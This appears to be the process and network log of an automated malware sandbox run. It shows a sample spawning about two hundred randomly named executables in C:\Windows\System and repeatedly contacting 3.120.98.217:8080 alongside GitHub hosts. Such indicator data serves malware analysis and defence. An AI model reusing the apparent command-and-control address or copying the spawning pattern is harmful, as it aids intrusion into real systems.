C:\Windows\System\HhondrE.exe

C:\Windows\System\nixxXMz.exe

C:\Windows\System\nixxXMz.exe

C:\Windows\System\yNZaHme.exe

C:\Windows\System\yNZaHme.exe

C:\Windows\System\RaFXQMj.exe

C:\Windows\System\RaFXQMj.exe

C:\Windows\System\MZJTipc.exe

C:\Windows\System\MZJTipc.exe

C:\Windows\System\OKxnsDk.exe

C:\Windows\System\OKxnsDk.exe

C:\Windows\System\GRdPdtJ.exe

C:\Windows\System\GRdPdtJ.exe

C:\Windows\System\ARpDKBs.exe

C:\Windows\System\ARpDKBs.exe

C:\Windows\System\YcMjhJs.exe

C:\Windows\System\YcMjhJs.exe

C:\Windows\System\NLgRGtx.exe

C:\Windows\System\NLgRGtx.exe

C:\Windows\System\qcEcAsk.exe

C:\Windows\System\qcEcAsk.exe

C:\Windows\System\bfEaguf.exe

C:\Windows\System\bfEaguf.exe

C:\Windows\System\NadMNfg.exe

C:\Windows\System\NadMNfg.exe

C:\Windows\System\HDAGQoj.exe

C:\Windows\System\HDAGQoj.exe

C:\Windows\System\DKglXbH.exe

C:\Windows\System\DKglXbH.exe

C:\Windows\System\YQSnScn.exe

C:\Windows\System\YQSnScn.exe

C:\Windows\System\AmLcmmA.exe

C:\Windows\System\AmLcmmA.exe

C:\Windows\System\VssSWoa.exe

C:\Windows\System\VssSWoa.exe

C:\Windows\System\bgnrAgs.exe

C:\Windows\System\bgnrAgs.exe

C:\Windows\System\opbFkVA.exe

C:\Windows\System\opbFkVA.exe

C:\Windows\System\WEtHboy.exe

C:\Windows\System\WEtHboy.exe

C:\Windows\System\RHXgnYr.exe

C:\Windows\System\RHXgnYr.exe

C:\Windows\System\UzCROSn.exe

C:\Windows\System\UzCROSn.exe

C:\Windows\System\iiEbVsL.exe

C:\Windows\System\iiEbVsL.exe

C:\Windows\System\uyHwGAP.exe

C:\Windows\System\uyHwGAP.exe

C:\Windows\System\sdQxOeq.exe

C:\Windows\System\sdQxOeq.exe

C:\Windows\System\pUHCmQJ.exe

C:\Windows\System\pUHCmQJ.exe

C:\Windows\System\feYzHYk.exe

C:\Windows\System\feYzHYk.exe

C:\Windows\System\PrLDPzt.exe

C:\Windows\System\PrLDPzt.exe

C:\Windows\System\LVdVlzp.exe

C:\Windows\System\LVdVlzp.exe

C:\Windows\System\uieGOwb.exe

C:\Windows\System\uieGOwb.exe

C:\Windows\System\FmLuPag.exe

C:\Windows\System\FmLuPag.exe

C:\Windows\System\zjexFDi.exe

C:\Windows\System\zjexFDi.exe

C:\Windows\System\itRhWDP.exe

C:\Windows\System\itRhWDP.exe

C:\Windows\System\mMeULEb.exe

C:\Windows\System\mMeULEb.exe

C:\Windows\System\xkuKTqG.exe

C:\Windows\System\xkuKTqG.exe

C:\Windows\System\dnIbXEo.exe

C:\Windows\System\dnIbXEo.exe

C:\Windows\System\zopfOGs.exe

C:\Windows\System\zopfOGs.exe

C:\Windows\System\FToeVza.exe

C:\Windows\System\FToeVza.exe

C:\Windows\System\GVzQIJd.exe

C:\Windows\System\GVzQIJd.exe

C:\Windows\System\sTuoCVn.exe

C:\Windows\System\sTuoCVn.exe

C:\Windows\System\ASBEETO.exe

C:\Windows\System\ASBEETO.exe

C:\Windows\System\nUuyJRr.exe

C:\Windows\System\nUuyJRr.exe

C:\Windows\System\kSqlhBk.exe

C:\Windows\System\kSqlhBk.exe

C:\Windows\System\bpcnyuz.exe

C:\Windows\System\bpcnyuz.exe

C:\Windows\System\YhyJGQg.exe

C:\Windows\System\YhyJGQg.exe

C:\Windows\System\FVPlAPr.exe

C:\Windows\System\FVPlAPr.exe

C:\Windows\System\XWFiryt.exe

C:\Windows\System\XWFiryt.exe

C:\Windows\System\eubqmJR.exe

C:\Windows\System\eubqmJR.exe

C:\Windows\System\eLSzelb.exe

C:\Windows\System\eLSzelb.exe

C:\Windows\System\JOgMZiu.exe

C:\Windows\System\JOgMZiu.exe

C:\Windows\System\iaGtGzF.exe

C:\Windows\System\iaGtGzF.exe

C:\Windows\System\gTBVLmO.exe

C:\Windows\System\gTBVLmO.exe

C:\Windows\System\dLuhxDr.exe

C:\Windows\System\dLuhxDr.exe

C:\Windows\System\aFFmNdd.exe

C:\Windows\System\aFFmNdd.exe

C:\Windows\System\GFjLTQR.exe

C:\Windows\System\GFjLTQR.exe

C:\Windows\System\GHphxQg.exe

C:\Windows\System\GHphxQg.exe

C:\Windows\System\ExkaDWi.exe

C:\Windows\System\ExkaDWi.exe

C:\Windows\System\VeQDoxy.exe

C:\Windows\System\VeQDoxy.exe

C:\Windows\System\bwuOWfe.exe

C:\Windows\System\bwuOWfe.exe

C:\Windows\System\uiinoEZ.exe

C:\Windows\System\uiinoEZ.exe

C:\Windows\System\YUjDaCv.exe

C:\Windows\System\YUjDaCv.exe

C:\Windows\System\AauKymo.exe

C:\Windows\System\AauKymo.exe

C:\Windows\System\AUOdIJX.exe

C:\Windows\System\AUOdIJX.exe

C:\Windows\System\cyyliSz.exe

C:\Windows\System\cyyliSz.exe

C:\Windows\System\POxcrzO.exe

C:\Windows\System\POxcrzO.exe

C:\Windows\System\RPTjPcV.exe

C:\Windows\System\RPTjPcV.exe

C:\Windows\System\TzrPMfB.exe

C:\Windows\System\TzrPMfB.exe

C:\Windows\System\BpAoPCh.exe

C:\Windows\System\BpAoPCh.exe

C:\Windows\System\HMAyXmM.exe

C:\Windows\System\HMAyXmM.exe

C:\Windows\System\urLkOyo.exe

C:\Windows\System\urLkOyo.exe

C:\Windows\System\aJpaRsS.exe

C:\Windows\System\aJpaRsS.exe

C:\Windows\System\CXavZKa.exe

C:\Windows\System\CXavZKa.exe

C:\Windows\System\SIuLBnb.exe

C:\Windows\System\SIuLBnb.exe

C:\Windows\System\OAAccAZ.exe

C:\Windows\System\OAAccAZ.exe

C:\Windows\System\utKVQXE.exe

C:\Windows\System\utKVQXE.exe

C:\Windows\System\RSQMjtM.exe

C:\Windows\System\RSQMjtM.exe

C:\Windows\System\RWCsuGf.exe

C:\Windows\System\RWCsuGf.exe

C:\Windows\System\tVyrkWQ.exe

C:\Windows\System\tVyrkWQ.exe

C:\Windows\System\XwXEfFb.exe

C:\Windows\System\XwXEfFb.exe

C:\Windows\System\vJwTNZX.exe

C:\Windows\System\vJwTNZX.exe

C:\Windows\System\TscuBaa.exe

C:\Windows\System\TscuBaa.exe

C:\Windows\System\sSoQTAO.exe

C:\Windows\System\sSoQTAO.exe

C:\Windows\System\febepLc.exe

C:\Windows\System\febepLc.exe

C:\Windows\System\Toqelww.exe

C:\Windows\System\Toqelww.exe

C:\Windows\System\eoDHSxO.exe

C:\Windows\System\eoDHSxO.exe

C:\Windows\System\WqKfeLO.exe

C:\Windows\System\WqKfeLO.exe

C:\Windows\System\uVndCFu.exe

C:\Windows\System\uVndCFu.exe

C:\Windows\System\zrZmpqC.exe

C:\Windows\System\zrZmpqC.exe

C:\Windows\System\hnngKfM.exe

C:\Windows\System\hnngKfM.exe

C:\Windows\System\WihhTVU.exe

C:\Windows\System\WihhTVU.exe

C:\Windows\System\PkLFTLc.exe

C:\Windows\System\PkLFTLc.exe

C:\Windows\System\XhQOeWQ.exe

C:\Windows\System\XhQOeWQ.exe

C:\Windows\System\yRNjZQk.exe

C:\Windows\System\yRNjZQk.exe

C:\Windows\System\ZWrNOmj.exe

C:\Windows\System\ZWrNOmj.exe

C:\Windows\System\sIqVFfO.exe

C:\Windows\System\sIqVFfO.exe

C:\Windows\System\bitRlgm.exe

C:\Windows\System\bitRlgm.exe

C:\Windows\System\FvXiCdc.exe

C:\Windows\System\FvXiCdc.exe

C:\Windows\System\uHAbKXn.exe

C:\Windows\System\uHAbKXn.exe

C:\Windows\System\HgHSFgn.exe

C:\Windows\System\HgHSFgn.exe

C:\Windows\System\oWQSWmi.exe

C:\Windows\System\oWQSWmi.exe

C:\Windows\System\mfAYkrO.exe

C:\Windows\System\mfAYkrO.exe

C:\Windows\System\fmqcyuH.exe

C:\Windows\System\fmqcyuH.exe

C:\Windows\System\SBPTlqQ.exe

C:\Windows\System\SBPTlqQ.exe

C:\Windows\System\eNWbLrF.exe

C:\Windows\System\eNWbLrF.exe

C:\Windows\System\aPTbhZE.exe

C:\Windows\System\aPTbhZE.exe

C:\Windows\System\jygeptD.exe

C:\Windows\System\jygeptD.exe

C:\Windows\System\NuJJURP.exe

C:\Windows\System\NuJJURP.exe

C:\Windows\System\DLpWofv.exe

C:\Windows\System\DLpWofv.exe

C:\Windows\System\SQfqmll.exe

C:\Windows\System\SQfqmll.exe

C:\Windows\System\Zebfbhq.exe

C:\Windows\System\Zebfbhq.exe

C:\Windows\System\AHBqtBV.exe

C:\Windows\System\AHBqtBV.exe

C:\Windows\System\pzFlQgq.exe

C:\Windows\System\pzFlQgq.exe

C:\Windows\System\YScljkV.exe

C:\Windows\System\YScljkV.exe

C:\Windows\System\OGRKntz.exe

C:\Windows\System\OGRKntz.exe

C:\Windows\System\FQDlzZn.exe

C:\Windows\System\FQDlzZn.exe

C:\Windows\System\ZaAIdGe.exe

C:\Windows\System\ZaAIdGe.exe

C:\Windows\System\VaRxWyl.exe

C:\Windows\System\VaRxWyl.exe

C:\Windows\System\HHDETIt.exe

C:\Windows\System\HHDETIt.exe

C:\Windows\System\xyCNlMU.exe

C:\Windows\System\xyCNlMU.exe

C:\Windows\System\zTQUhBQ.exe

C:\Windows\System\zTQUhBQ.exe

C:\Windows\System\YHKIpci.exe

C:\Windows\System\YHKIpci.exe

C:\Windows\System\ZBtHqsD.exe

C:\Windows\System\ZBtHqsD.exe

C:\Windows\System\oGbQLBH.exe

C:\Windows\System\oGbQLBH.exe

C:\Windows\System\BETGYOD.exe

C:\Windows\System\BETGYOD.exe

C:\Windows\System\pXPOCBe.exe

C:\Windows\System\pXPOCBe.exe

C:\Windows\System\IjPcgKf.exe

C:\Windows\System\IjPcgKf.exe

C:\Windows\System\XiTSSDm.exe

C:\Windows\System\XiTSSDm.exe

C:\Windows\System\nxMaxQp.exe

C:\Windows\System\nxMaxQp.exe

C:\Windows\System\LCcpqdO.exe

C:\Windows\System\LCcpqdO.exe

C:\Windows\System\RwlmGcn.exe

C:\Windows\System\RwlmGcn.exe

C:\Windows\System\mYbLPPJ.exe

C:\Windows\System\mYbLPPJ.exe

C:\Windows\System\UOyxCFf.exe

C:\Windows\System\UOyxCFf.exe

C:\Windows\System\SzpxEyT.exe

C:\Windows\System\SzpxEyT.exe

C:\Windows\System\zszqyoi.exe

C:\Windows\System\zszqyoi.exe

C:\Windows\System\YggiJKR.exe

C:\Windows\System\YggiJKR.exe

C:\Windows\System\eVhWkYj.exe

C:\Windows\System\eVhWkYj.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System\KXYmdqi.exe

C:\Windows\System\KXYmdqi.exe

C:\Windows\System\YucafCX.exe

C:\Windows\System\YucafCX.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System\EpYXdZB.exe

C:\Windows\System\EpYXdZB.exe

C:\Windows\System\baUDkmc.exe

C:\Windows\System\baUDkmc.exe

C:\Windows\System\mDVFAYq.exe

C:\Windows\System\mDVFAYq.exe

C:\Windows\System\PhVcuxG.exe

C:\Windows\System\PhVcuxG.exe

C:\Windows\System\SyaQDtM.exe

C:\Windows\System\SyaQDtM.exe

C:\Windows\System\qRcGgAu.exe

C:\Windows\System\qRcGgAu.exe

C:\Windows\System\mrYKXXk.exe

C:\Windows\System\mrYKXXk.exe

C:\Windows\System\QNTPrHM.exe

C:\Windows\System\QNTPrHM.exe

C:\Windows\System\bFNePJr.exe

C:\Windows\System\bFNePJr.exe

C:\Windows\System\ndjvJId.exe

C:\Windows\System\ndjvJId.exe

C:\Windows\System\QmbONha.exe

C:\Windows\System\QmbONha.exe

C:\Windows\System\GbUYGcZ.exe

C:\Windows\System\GbUYGcZ.exe

C:\Windows\System\jisTdZk.exe

C:\Windows\System\jisTdZk.exe

C:\Windows\System\IyFUwnu.exe

C:\Windows\System\IyFUwnu.exe

C:\Windows\System\YqvrxNs.exe

C:\Windows\System\YqvrxNs.exe

C:\Windows\System\giQBVwJ.exe

C:\Windows\System\giQBVwJ.exe

C:\Windows\System\cFQJPXv.exe

C:\Windows\System\cFQJPXv.exe

C:\Windows\System\XUfxYMZ.exe

C:\Windows\System\XUfxYMZ.exe

C:\Windows\System\zAUmSTg.exe

C:\Windows\System\zAUmSTg.exe

C:\Windows\System\YTQJCNq.exe

C:\Windows\System\YTQJCNq.exe

C:\Windows\System\runCRHX.exe

C:\Windows\System\runCRHX.exe

C:\Windows\System\xQcmXIu.exe

C:\Windows\System\xQcmXIu.exe

C:\Windows\System\tgaSieo.exe

C:\Windows\System\tgaSieo.exe

C:\Windows\System\kaXOaBO.exe

C:\Windows\System\kaXOaBO.exe

C:\Windows\System\bXGdDNg.exe

C:\Windows\System\bXGdDNg.exe

C:\Windows\System\pIAKSzu.exe

C:\Windows\System\pIAKSzu.exe

C:\Windows\System\LLRNkQL.exe

C:\Windows\System\LLRNkQL.exe

C:\Windows\System\ZLJVmon.exe

C:\Windows\System\ZLJVmon.exe

C:\Windows\System\KeksXmV.exe

C:\Windows\System\KeksXmV.exe

C:\Windows\System\JEQnXDW.exe

C:\Windows\System\JEQnXDW.exe

C:\Windows\System\EzWvExp.exe

C:\Windows\System\EzWvExp.exe

C:\Windows\System\yMJXcRi.exe

C:\Windows\System\yMJXcRi.exe

C:\Windows\System\cGTecHF.exe

C:\Windows\System\cGTecHF.exe

C:\Windows\System\ZebBejW.exe

C:\Windows\System\ZebBejW.exe

C:\Windows\System\KAjYEwC.exe

C:\Windows\System\KAjYEwC.exe

C:\Windows\System\qKnFiuV.exe

C:\Windows\System\qKnFiuV.exe

C:\Windows\System\DgdzzSt.exe

C:\Windows\System\DgdzzSt.exe

C:\Windows\System\faWJilx.exe

C:\Windows\System\faWJilx.exe

C:\Windows\System\rMvJgtq.exe

C:\Windows\System\rMvJgtq.exe

C:\Windows\System\dZUttOH.exe

C:\Windows\System\dZUttOH.exe

C:\Windows\System\lxzjRld.exe

C:\Windows\System\lxzjRld.exe

C:\Windows\System\haRpjPN.exe

C:\Windows\System\haRpjPN.exe

C:\Windows\System\MrPnmvI.exe

C:\Windows\System\MrPnmvI.exe

C:\Windows\System\OrUaJLA.exe

C:\Windows\System\OrUaJLA.exe

C:\Windows\System\nBUHDtp.exe

C:\Windows\System\nBUHDtp.exe

C:\Windows\System\Qpsdwrm.exe

C:\Windows\System\Qpsdwrm.exe

C:\Windows\System\qzRbTFL.exe

C:\Windows\System\qzRbTFL.exe

C:\Windows\System\oKngvEG.exe

C:\Windows\System\oKngvEG.exe

C:\Windows\System\CGHDsIo.exe

C:\Windows\System\CGHDsIo.exe

C:\Windows\System\LPqiNgE.exe

C:\Windows\System\LPqiNgE.exe

C:\Windows\System\HvMplaZ.exe

C:\Windows\System\HvMplaZ.exe

C:\Windows\System\IVPlufb.exe

C:\Windows\System\IVPlufb.exe

C:\Windows\System\siZVcqG.exe

C:\Windows\System\siZVcqG.exe

C:\Windows\System\okwmWBI.exe

C:\Windows\System\okwmWBI.exe

C:\Windows\System\oLNnZJS.exe

C:\Windows\System\oLNnZJS.exe

C:\Windows\System\wjtoXDO.exe

C:\Windows\System\wjtoXDO.exe

C:\Windows\System\XPSQUau.exe

C:\Windows\System\XPSQUau.exe

C:\Windows\System\PLmionL.exe

C:\Windows\System\PLmionL.exe

C:\Windows\System\gbVEUJG.exe

C:\Windows\System\gbVEUJG.exe

C:\Windows\System\YohnLlU.exe

C:\Windows\System\YohnLlU.exe

C:\Windows\System\kQBxTyx.exe

C:\Windows\System\kQBxTyx.exe

C:\Windows\System\FQlHDoz.exe

C:\Windows\System\FQlHDoz.exe

C:\Windows\System\goCPrDf.exe

C:\Windows\System\goCPrDf.exe

C:\Windows\System\VxDdVcY.exe

C:\Windows\System\VxDdVcY.exe

C:\Windows\System\HeOXYfu.exe

C:\Windows\System\HeOXYfu.exe

C:\Windows\System\cIPEHaB.exe

C:\Windows\System\cIPEHaB.exe

C:\Windows\System\kCzAicj.exe

C:\Windows\System\kCzAicj.exe

C:\Windows\System\HFpMAMN.exe

C:\Windows\System\HFpMAMN.exe

C:\Windows\System\NmMvMPV.exe

C:\Windows\System\NmMvMPV.exe

C:\Windows\System\TTZyAYq.exe

C:\Windows\System\TTZyAYq.exe

C:\Windows\System\idqlYtX.exe

C:\Windows\System\idqlYtX.exe

C:\Windows\System\OEjTNYU.exe

C:\Windows\System\OEjTNYU.exe

C:\Windows\System\INKanjh.exe

C:\Windows\System\INKanjh.exe

C:\Windows\System\GuhSGuZ.exe

C:\Windows\System\GuhSGuZ.exe

C:\Windows\System\OGFQmZe.exe

C:\Windows\System\OGFQmZe.exe

C:\Windows\System\hGDvEFg.exe

C:\Windows\System\hGDvEFg.exe

C:\Windows\System\dSDMGFT.exe

C:\Windows\System\dSDMGFT.exe

C:\Windows\System\UrZxBEX.exe

C:\Windows\System\UrZxBEX.exe

C:\Windows\System\JHDTHzD.exe

C:\Windows\System\JHDTHzD.exe

C:\Windows\System\EjrRkIO.exe

C:\Windows\System\EjrRkIO.exe

C:\Windows\System\FokahUe.exe

C:\Windows\System\FokahUe.exe

C:\Windows\System\eQgekSp.exe

C:\Windows\System\eQgekSp.exe

C:\Windows\System\tmZoudM.exe

C:\Windows\System\tmZoudM.exe

C:\Windows\System\oUKXBJI.exe

C:\Windows\System\oUKXBJI.exe

C:\Windows\System\eiIHTiX.exe

C:\Windows\System\eiIHTiX.exe

C:\Windows\System\tMwwuIq.exe

C:\Windows\System\tMwwuIq.exe

C:\Windows\System\ocyKIiK.exe

C:\Windows\System\ocyKIiK.exe

C:\Windows\System\XizwkdJ.exe

C:\Windows\System\XizwkdJ.exe

C:\Windows\System\BzzIoRd.exe

C:\Windows\System\BzzIoRd.exe

C:\Windows\System\kCAXobY.exe

C:\Windows\System\kCAXobY.exe

C:\Windows\System\bsJlbGm.exe

C:\Windows\System\bsJlbGm.exe

C:\Windows\System\NovJlUl.exe

C:\Windows\System\NovJlUl.exe

C:\Windows\System\TEygBOS.exe

C:\Windows\System\TEygBOS.exe

C:\Windows\System\fIovcsf.exe

C:\Windows\System\fIovcsf.exe

C:\Windows\System\dnrSLxY.exe

C:\Windows\System\dnrSLxY.exe

C:\Windows\System\PhxSabO.exe

C:\Windows\System\PhxSabO.exe

C:\Windows\System\TAudwLA.exe

C:\Windows\System\TAudwLA.exe

C:\Windows\System\dZOxLuc.exe

C:\Windows\System\dZOxLuc.exe

C:\Windows\System\etdJJoH.exe

C:\Windows\System\etdJJoH.exe

C:\Windows\System\jYzoAsd.exe

C:\Windows\System\jYzoAsd.exe

C:\Windows\System\aOXqBAq.exe

C:\Windows\System\aOXqBAq.exe

C:\Windows\System\loNHKuV.exe

C:\Windows\System\loNHKuV.exe

C:\Windows\System\AclvRxC.exe

C:\Windows\System\AclvRxC.exe

C:\Windows\System\ovAdiDL.exe

C:\Windows\System\ovAdiDL.exe

C:\Windows\System\zCmXKtH.exe

C:\Windows\System\zCmXKtH.exe

C:\Windows\System\gvcpzBv.exe

C:\Windows\System\gvcpzBv.exe

C:\Windows\System\pUtELsW.exe

C:\Windows\System\pUtELsW.exe

C:\Windows\System\kfuGbKe.exe

C:\Windows\System\kfuGbKe.exe

C:\Windows\System\wmDeVuH.exe

C:\Windows\System\wmDeVuH.exe

C:\Windows\System\aYqkaGd.exe

C:\Windows\System\aYqkaGd.exe

C:\Windows\System\DMIvGED.exe

C:\Windows\System\DMIvGED.exe

C:\Windows\System\deJnaQg.exe

C:\Windows\System\deJnaQg.exe

C:\Windows\System\eaQAVcI.exe

C:\Windows\System\eaQAVcI.exe

C:\Windows\System\EVbUMAA.exe

C:\Windows\System\EVbUMAA.exe

C:\Windows\System\vXEBLsY.exe

C:\Windows\System\vXEBLsY.exe

C:\Windows\System\VMDtAgs.exe

C:\Windows\System\VMDtAgs.exe

C:\Windows\System\YDxZfam.exe

C:\Windows\System\YDxZfam.exe

C:\Windows\System\xJXPdTZ.exe

C:\Windows\System\xJXPdTZ.exe

C:\Windows\System\UXTkhwW.exe

C:\Windows\System\UXTkhwW.exe

C:\Windows\System\rSgVyTZ.exe

C:\Windows\System\rSgVyTZ.exe

C:\Windows\System\nzsYXXs.exe

C:\Windows\System\nzsYXXs.exe

C:\Windows\System\TpezHky.exe

C:\Windows\System\TpezHky.exe

C:\Windows\System\QKorsbh.exe

C:\Windows\System\QKorsbh.exe

C:\Windows\System\kOIpaZp.exe

C:\Windows\System\kOIpaZp.exe

C:\Windows\System\CaLEeHG.exe

C:\Windows\System\CaLEeHG.exe

C:\Windows\System\JASTHTB.exe

C:\Windows\System\JASTHTB.exe

C:\Windows\System\jMDgUPn.exe

C:\Windows\System\jMDgUPn.exe

C:\Windows\System\tHUBroy.exe

C:\Windows\System\tHUBroy.exe

C:\Windows\System\ObSQYKH.exe

C:\Windows\System\ObSQYKH.exe

C:\Windows\System\YiwGCUG.exe

C:\Windows\System\YiwGCUG.exe

C:\Windows\System\hQimWWW.exe

C:\Windows\System\hQimWWW.exe

C:\Windows\System\miMcAri.exe

C:\Windows\System\miMcAri.exe

C:\Windows\System\SVXEmis.exe

C:\Windows\System\SVXEmis.exe

C:\Windows\System\KFnwBJt.exe

C:\Windows\System\KFnwBJt.exe

C:\Windows\System\TzOVdRS.exe

C:\Windows\System\TzOVdRS.exe

C:\Windows\System\RhyLjZs.exe

C:\Windows\System\RhyLjZs.exe

C:\Windows\System\fCIarPU.exe

C:\Windows\System\fCIarPU.exe

C:\Windows\System\rngGswo.exe

C:\Windows\System\rngGswo.exe

C:\Windows\System\fuWbEOk.exe

C:\Windows\System\fuWbEOk.exe

C:\Windows\System\zNCiaTm.exe

C:\Windows\System\zNCiaTm.exe

C:\Windows\System\WmJKZSc.exe

C:\Windows\System\WmJKZSc.exe

C:\Windows\System\gPoyrFP.exe

C:\Windows\System\gPoyrFP.exe

C:\Windows\System\wspoksc.exe

C:\Windows\System\wspoksc.exe

C:\Windows\System\QJZVibK.exe

C:\Windows\System\QJZVibK.exe

C:\Windows\System\QTPKLrq.exe

C:\Windows\System\QTPKLrq.exe

C:\Windows\System\qkbTrFc.exe

C:\Windows\System\qkbTrFc.exe

C:\Windows\System\DPqdAJF.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files
